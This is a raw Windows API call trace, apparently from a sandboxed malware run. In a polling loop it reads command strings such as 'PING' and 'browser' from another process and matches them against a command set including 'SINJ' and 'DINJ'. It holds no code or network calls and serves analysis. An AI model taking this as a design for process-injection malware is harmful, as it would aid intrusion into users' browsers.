	[0234.595] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225e30) returned 1
	[0234.595] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745158) returned 1
	[0234.595] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2255b0) returned 1
	[0234.595] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737ef8
	[0234.595] lstrcmpiW (lpString1="DPST", lpString2="ModuleQuery") returned -1
	[0234.595] lstrcmpiW (lpString1="DPST", lpString2="WantRelease") returned -1
	[0234.595] lstrcmpiW (lpString1="DPST", lpString2="VERS") returned -1
	[0234.595] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0234.595] lstrcmpiW (lpString1="DPST", lpString2="DINJ") returned 1
	[0234.595] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b77a0
	[0234.595] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2737e30, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xd9c) returned 0x564
	[0234.596] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27382e0
	[0234.596] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.596] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.596] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.596] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27382e0) returned 1
	[0234.596] Sleep (dwMilliseconds=0xbb8) 
	[0234.609] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.609] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.609] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.609] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.609] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.609] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bee60) returned 1
	[0234.609] Sleep (dwMilliseconds=0xbb8) 
	[0234.625] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.625] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.626] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.626] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.626] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.626] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bef50) returned 1
	[0234.626] Sleep (dwMilliseconds=0xbb8) 
	[0234.640] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.641] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.641] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.641] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.641] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.641] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf518) returned 1
	[0234.641] Sleep (dwMilliseconds=0xbb8) 
	[0234.656] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0234.656] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2255b0
	[0234.656] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x27d4040
	[0234.656] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225b00
	[0234.656] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0234.656] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x2255b0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2255b0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0234.656] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7c08
	[0234.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x22b7c08, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0234.656] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x27d4040, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x27d4040, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0234.656] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225b00, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225b00*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0234.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0234.656] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf540
	[0234.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b00, cbMultiByte=-1, lpWideCharStr=0x27bf540, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0234.656] SetEvent (hEvent=0x474) returned 1
	[0234.656] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2255b0) returned 1
	[0234.657] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27d4040) returned 1
	[0234.657] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225b00) returned 1
	[0234.657] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf568
	[0234.657] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0234.657] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0234.657] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0234.657] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0234.657] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0234.657] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7c20
	[0234.657] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27bf518, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0x8ec) returned 0x6b4
	[0234.657] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf590
	[0234.657] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.657] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.657] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.657] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.658] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf590) returned 1
	[0234.658] Sleep (dwMilliseconds=0xbb8) 
	[0234.672] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.672] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.672] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.672] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.672] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.672] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf590) returned 1
	[0234.672] Sleep (dwMilliseconds=0xbb8) 
	[0234.687] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.687] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.687] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.687] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.687] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.687] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfc98) returned 1
	[0234.688] Sleep (dwMilliseconds=0xbb8) 
	[0234.703] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.703] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.703] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.703] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.703] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.703] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfc98) returned 1
	[0234.703] Sleep (dwMilliseconds=0xbb8) 
	[0234.718] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.718] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.718] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.718] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.718] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.718] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfcc0) returned 1
	[0234.718] Sleep (dwMilliseconds=0xbb8) 
	[0234.749] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.749] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.749] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.749] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.749] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.749] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfce8) returned 1
	[0234.749] Sleep (dwMilliseconds=0xbb8) 
	[0234.749] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.749] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.749] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.749] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.750] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.750] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfce8) returned 1
	[0234.750] Sleep (dwMilliseconds=0xbb8) 
	[0234.776] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.776] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.776] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.776] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.777] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.777] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfce8) returned 1
	[0234.777] Sleep (dwMilliseconds=0xbb8) 
	[0234.783] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.783] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.783] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.783] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.783] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.783] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0234.783] Sleep (dwMilliseconds=0xbb8) 
	[0234.818] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.818] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.818] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.819] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.820] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.820] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfe28) returned 1
	[0234.820] Sleep (dwMilliseconds=0xbb8) 
	[0234.827] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.827] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.827] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.828] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.828] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.828] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfe28) returned 1
	[0234.828] Sleep (dwMilliseconds=0xbb8) 
	[0234.847] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.847] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.847] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.847] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.847] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.847] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfe78) returned 1
	[0234.847] Sleep (dwMilliseconds=0xbb8) 
	[0234.859] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.859] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.859] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.859] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.859] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.859] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfe78) returned 1
	[0234.859] Sleep (dwMilliseconds=0xbb8) 
	[0234.874] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.874] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.874] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.874] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.875] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.875] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0234.875] Sleep (dwMilliseconds=0xbb8) 
	[0234.890] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.890] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.890] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.890] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.890] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.890] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0234.890] Sleep (dwMilliseconds=0xbb8) 
	[0234.906] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.906] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.906] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.906] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.906] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.906] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0234.906] Sleep (dwMilliseconds=0xbb8) 
	[0234.921] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.921] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.921] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.921] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.921] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.922] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0234.922] Sleep (dwMilliseconds=0xbb8) 
	[0234.946] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.946] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.946] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.946] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.947] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.947] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0234.947] Sleep (dwMilliseconds=0xbb8) 
	[0234.985] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0234.985] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0234.985] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0234.985] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0234.985] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0234.985] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0234.985] Sleep (dwMilliseconds=0xbb8) 
	[0235.031] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.031] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.031] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.031] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.031] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.031] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0235.031] Sleep (dwMilliseconds=0xbb8) 
	[0235.049] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.049] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.049] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.049] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.049] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.049] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0235.049] Sleep (dwMilliseconds=0xbb8) 
	[0235.063] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.063] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.063] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.063] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.063] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.063] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0235.063] Sleep (dwMilliseconds=0xbb8) 
	[0235.094] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.094] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.094] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.094] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.094] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.094] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0235.095] Sleep (dwMilliseconds=0xbb8) 
	[0235.109] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.109] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.109] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.109] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.109] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.109] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0235.110] Sleep (dwMilliseconds=0xbb8) 
	[0235.125] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.125] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.125] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.125] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.125] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.125] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0235.125] Sleep (dwMilliseconds=0xbb8) 
	[0235.187] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0235.187] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225d20
	[0235.187] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x27eb088
	[0235.187] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225f40
	[0235.187] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0235.187] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225d20, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225d20*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0235.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0235.187] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7b48
	[0235.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x22b7b48, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0235.187] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x27eb088, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x27eb088, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0235.187] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225f40, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225f40*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0235.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225f40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0235.187] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf310
	[0235.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225f40, cbMultiByte=-1, lpWideCharStr=0x27bf310, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0235.187] SetEvent (hEvent=0x474) returned 1
	[0235.187] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225d20) returned 1
	[0235.187] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27eb088) returned 1
	[0235.187] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225f40) returned 1
	[0235.187] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27beeb0
	[0235.187] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0235.187] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0235.187] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0235.187] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0235.187] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0235.188] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7530
	[0235.188] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27bf2e8, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xbf0) returned 0x6a4
	[0235.188] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27beff0
	[0235.188] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.188] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.188] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.188] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.188] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27beff0) returned 1
	[0235.188] Sleep (dwMilliseconds=0xbb8) 
	[0235.202] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.202] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.202] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.202] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.202] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.202] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27beff0) returned 1
	[0235.202] Sleep (dwMilliseconds=0xbb8) 
	[0235.218] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.218] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.218] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.218] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.218] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.218] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27beff0) returned 1
	[0235.218] Sleep (dwMilliseconds=0xbb8) 
	[0235.255] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.255] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.255] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.255] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
